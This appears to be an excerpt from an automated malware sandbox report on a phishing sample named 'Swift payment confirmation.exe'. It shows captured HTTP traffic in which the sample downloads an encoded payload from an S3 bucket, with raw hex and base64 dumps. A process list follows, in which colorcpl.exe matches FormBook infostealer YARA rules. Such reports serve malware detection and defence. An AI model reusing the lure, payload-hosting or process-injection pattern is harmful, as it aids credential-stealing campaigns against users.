                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: bbuseruploads.s3.amazonaws.com
                                                                              2024-10-31 08:07:07 UTC | 564 | IN | HTTP/1.1 200 OK
                                                                              x-amz-id-2: YQF1Mpb0oxWaAdbK7gqfUgJkaB+ytoqL3BOd6ZVnbssJyu7rXpRDyz8ciFah4qR0JSxxrvFVy/ka+l1s4KdRyQavU7lM1TvF
                                                                              x-amz-request-id: K2WZT6C5SKG9SHF8
                                                                              Date: Thu, 31 Oct 2024 08:07:08 GMT
                                                                              Last-Modified: Sun, 27 Oct 2024 21:53:04 GMT
                                                                              ETag: "271a5d4a7e33f8c487190f127c5e2f43"
                                                                              x-amz-server-side-encryption: AES256
                                                                              x-amz-version-id: iLAYpg_EnWYHrKq5hXoEQZgnva5dDdpK
                                                                              Content-Disposition: attachment; filename="233_Hherfkswbzh"
                                                                              Accept-Ranges: bytes
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 383260
                                                                              Server: AmazonS3
                                                                              Connection: close
                                                                              Data Ascii: vVjTP3fHAUIE+FRI+VeFxWVkqTOcr9sSCPxX3Qj/aG4zTPsFsOcujPjUEaHEvBevu0W3YHwETinAPAAtFnR45eRFLc26jaTDIfYQCDwUyslFHHxBQ5HvkZCukfitBZC8iu5ymY95K3iFGtWxEpElYKe1imanjhaPt6sXBWKEXhWzLwT3ARRpkR56r+1JrAf2Vub8ynPaDwNGPvlm8OQNIyuVbaH0FQYW8UDTMPXaHu5uY0gLLb3qPClS/D4K2zH
                                                                              2024-10-31 08:07:07 UTC1024INData Raw: 4c 2f 49 53 37 39 2f 5a 43 62 56 48 50 43 4b 2f 4c 44 48 2f 2f 57 57 50 4f 36 43 68 58 4d 6e 4c 34 72 57 37 2b 79 4f 78 36 4a 75 79 75 57 55 52 46 70 67 4a 46 39 41 56 6d 6f 45 36 6e 46 37 76 47 48 71 5a 64 36 4d 49 74 5a 2b 35 74 56 62 75 63 38 6e 2f 70 4c 6d 59 4c 4e 37 38 56 64 70 69 44 6c 7a 38 38 6f 38 59 39 6b 59 66 4e 56 50 63 4b 76 2b 55 7a 39 52 74 53 6b 53 34 58 49 6d 4b 44 66 52 6f 56 65 41 63 61 4a 30 36 59 61 2f 43 38 50 65 31 74 69 33 74 35 66 69 58 77 2f 76 77 76 6d 4b 52 4d 30 45 77 53 48 4a 6c 71 73 6d 4d 46 73 59 6d 63 56 66 4c 52 76 4e 63 4d 61 71 79 58 66 35 72 6a 4d 31 63 39 62 39 30 6d 55 38 44 36 53 38 6c 41 4b 53 71 38 6f 39 56 62 68 6a 35 44 50 32 4a 49 72 43 73 39 70 46 51 67 6f 35 5a 77 68 56 62 59 34 45 69 54 44 32 56 55 32 6b
                                                                              Data Ascii: L/IS79/ZCbVHPCK/LDH//WWPO6ChXMnL4rW7+yOx6JuyuWURFpgJF9AVmoE6nF7vGHqZd6MItZ+5tVbuc8n/pLmYLN78VdpiDlz88o8Y9kYfNVPcKv+Uz9RtSkS4XImKDfRoVeAcaJ06Ya/C8Pe1ti3t5fiXw/vwvmKRM0EwSHJlqsmMFsYmcVfLRvNcMaqyXf5rjM1c9b90mU8D6S8lAKSq8o9Vbhj5DP2JIrCs9pFQgo5ZwhVbY4EiTD2VU2k
                                                                              2024-10-31 08:07:07 UTC1795INData Raw: 4e 4d 35 42 4a 4d 37 51 63 6f 73 56 74 32 4b 78 38 38 5a 6c 71 34 61 4b 49 4e 30 49 53 73 55 41 62 54 54 52 57 6f 66 48 75 6c 77 47 2f 58 76 53 4d 4c 66 6c 6c 4c 55 63 61 79 2f 45 51 69 33 55 55 56 4f 4b 47 68 2f 62 32 4c 34 6d 64 30 64 37 68 6e 39 53 55 52 52 42 4a 46 47 50 4a 4b 68 68 54 75 58 67 58 6f 49 4e 76 31 64 44 53 6a 6b 77 47 42 34 4e 37 72 72 44 49 67 4c 6b 4c 42 63 72 4e 6d 79 76 58 46 4e 47 72 30 63 6b 39 2b 50 45 42 4f 4a 6b 46 57 4a 50 6f 63 37 6f 37 53 6a 78 77 70 48 68 6d 63 6d 6d 72 36 37 51 65 35 6a 57 57 31 75 65 63 45 4e 56 76 45 64 30 42 35 6f 38 77 51 75 6b 6d 30 31 78 66 71 79 46 4c 58 39 4a 31 37 34 35 50 69 4d 43 75 5a 73 78 56 74 2b 39 79 6e 45 46 7a 33 42 38 64 45 68 75 45 78 6a 41 45 4f 59 73 64 47 53 43 66 66 6e 52 47 6b 2f
                                                                              Data Ascii: NM5BJM7QcosVt2Kx88Zlq4aKIN0ISsUAbTTRWofHulwG/XvSMLfllLUcay/EQi3UUVOKGh/b2L4md0d7hn9SURRBJFGPJKhhTuXgXoINv1dDSjkwGB4N7rrDIgLkLBcrNmyvXFNGr0ck9+PEBOJkFWJPoc7o7SjxwpHhmcmmr67Qe5jWW1uecENVvEd0B5o8wQukm01xfqyFLX9J1745PiMCuZsxVt+9ynEFz3B8dEhuExjAEOYsdGSCffnRGk/
                                                                              2024-10-31 08:07:07 UTC9000INData Raw: 62 69 39 6e 75 69 61 4e 6b 39 62 54 52 77 4d 31 37 54 47 72 6e 67 4e 4e 57 6e 6e 77 46 67 63 71 4c 73 63 4e 2f 61 4d 77 38 78 68 48 6f 78 57 4e 52 66 4f 6c 64 71 42 4c 44 74 48 54 52 77 56 6f 35 4e 4d 66 74 2f 4a 54 2f 6a 4a 79 72 57 68 72 54 49 71 78 2f 44 5a 39 46 37 4e 32 6e 4d 56 41 33 79 74 53 78 68 43 52 52 69 6b 42 36 37 31 56 56 72 50 54 73 4e 64 45 63 57 4c 43 78 47 79 6e 75 37 74 5a 68 74 47 62 7a 75 2b 39 7a 58 35 44 4a 5a 2b 78 70 4d 56 5a 54 50 50 73 74 4f 62 70 39 53 47 47 64 4c 62 57 61 67 6e 42 75 63 45 38 57 69 58 6a 75 43 7a 4a 57 65 5a 41 38 69 56 4b 6b 42 6e 34 34 77 4e 44 70 39 4c 4d 32 41 78 58 5a 6a 52 6d 37 79 65 5a 75 73 53 31 4b 4d 49 4c 74 30 47 4c 67 51 6f 55 30 49 47 59 2b 36 4f 67 74 64 6a 52 6c 57 4c 6a 77 48 2b 6e 52 63 31
                                                                              Data Ascii: bi9nuiaNk9bTRwM17TGrngNNWnnwFgcqLscN/aMw8xhHoxWNRfOldqBLDtHTRwVo5NMft/JT/jJyrWhrTIqx/DZ9F7N2nMVA3ytSxhCRRikB671VVrPTsNdEcWLCxGynu7tZhtGbzu+9zX5DJZ+xpMVZTPPstObp9SGGdLbWagnBucE8WiXjuCzJWeZA8iVKkBn44wNDp9LM2AxXZjRm7yeZusS1KMILt0GLgQoU0IGY+6OgtdjRlWLjwH+nRc1
                                                                              2024-10-31 08:07:07 UTC16384INData Raw: 6d 2b 30 4f 68 4f 53 51 65 34 65 48 48 51 54 34 4f 4b 76 4c 35 78 4a 48 66 58 73 2b 50 57 35 4d 4e 53 52 37 31 49 45 72 69 51 42 77 65 57 6a 6c 4e 4b 66 2b 36 4e 4d 52 4b 47 78 35 32 6c 48 69 64 59 55 66 4f 63 71 76 30 76 5a 43 69 2f 32 65 77 67 58 48 2f 54 46 65 73 73 56 55 5a 30 2f 2b 70 30 57 47 48 64 38 6b 51 47 44 59 68 4c 32 4f 37 64 47 77 63 51 38 46 4f 50 75 72 4b 48 7a 4d 59 59 47 5a 74 70 48 31 63 62 7a 51 35 4a 76 77 6e 32 65 43 72 48 79 62 6e 51 48 4d 39 4c 48 64 32 50 70 73 63 75 7a 2f 78 77 46 6a 74 5a 58 32 33 6a 48 6b 69 67 4a 30 34 63 6d 7a 48 6a 4a 32 6a 74 6b 37 78 4f 6c 61 4c 65 57 51 31 54 48 42 50 44 68 6c 53 6d 77 71 4d 38 38 58 33 6e 47 69 71 34 71 70 36 61 2f 74 64 6e 4e 57 78 59 31 50 4e 51 79 58 76 37 56 39 52 67 72 47 64 4c 6b
                                                                              Data Ascii: m+0OhOSQe4eHHQT4OKvL5xJHfXs+PW5MNSR71IEriQBweWjlNKf+6NMRKGx52lHidYUfOcqv0vZCi/2ewgXH/TFessVUZ0/+p0WGHd8kQGDYhL2O7dGwcQ8FOPurKHzMYYGZtpH1cbzQ5Jvwn2eCrHybnQHM9LHd2Ppscuz/xwFjtZX23jHkigJ04cmzHjJ2jtk7xOlaLeWQ1THBPDhlSmwqM88X3nGiq4qp6a/tdnNWxY1PNQyXv7V9RgrGdLk
                                                                              2024-10-31 08:07:07 UTC1024INData Raw: 39 69 2b 35 70 43 6b 6c 2b 5a 55 2b 69 59 65 41 76 6c 43 6e 61 67 68 74 56 32 54 6f 68 63 33 6c 62 68 51 5a 4a 71 6f 4a 58 37 56 2b 4f 2f 30 32 55 4d 5a 4f 75 53 4d 6c 65 78 79 4c 54 5a 42 2f 6f 30 70 48 61 70 2b 54 47 55 4c 37 58 4f 54 30 51 32 48 66 2b 32 65 42 6c 4f 48 33 47 59 39 41 6b 4f 41 4e 5a 34 41 74 55 56 54 50 55 50 57 72 37 44 33 62 61 5a 77 2b 69 30 73 39 56 79 6a 78 32 37 48 48 72 37 63 61 34 47 4f 68 4c 33 36 2f 69 5a 7a 56 31 4d 2f 44 41 78 63 4e 76 4b 76 7a 48 6a 78 53 72 63 32 56 65 30 63 62 39 78 68 35 7a 62 56 30 6d 6f 68 75 55 30 5a 71 53 6f 66 5a 71 51 68 6d 55 48 46 55 4a 64 4c 2f 42 6c 78 5a 38 72 67 4e 56 31 71 6b 64 59 38 79 70 2b 6e 78 67 57 39 43 67 39 59 32 53 67 53 42 57 4c 39 69 4e 64 34 39 4f 33 6e 50 62 66 62 73 48 50 61
                                                                              Data Ascii: 9i+5pCkl+ZU+iYeAvlCnaghtV2Tohc3lbhQZJqoJX7V+O/02UMZOuSMlexyLTZB/o0pHap+TGUL7XOT0Q2Hf+2eBlOH3GY9AkOANZ4AtUVTPUPWr7D3baZw+i0s9Vyjx27HHr7ca4GOhL36/iZzV1M/DAxcNvKvzHjxSrc2Ve0cb9xh5zbV0mohuU0ZqSofZqQhmUHFUJdL/BlxZ8rgNV1qkdY8yp+nxgW9Cg9Y2SgSBWL9iNd49O3nPbfbsHPa



                                                                              Target ID:0
                                                                              Start time:04:06:55
                                                                              Start date:31/10/2024
                                                                              Path:C:\Users\user\Desktop\Swift payment confirmation.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Swift payment confirmation.exe"
                                                                              Imagebase:0x400000
                                                                              File size:1'033'216 bytes
                                                                              MD5 hash:92FDCC36BE7B26D49F67F2F02FEFBF07
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:04:07:08
                                                                              Start date:31/10/2024
                                                                              Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\colorcpl.exe
                                                                              Imagebase:0x660000
                                                                              File size:86'528 bytes
                                                                              MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:moderate
                                                                              Has exited:true
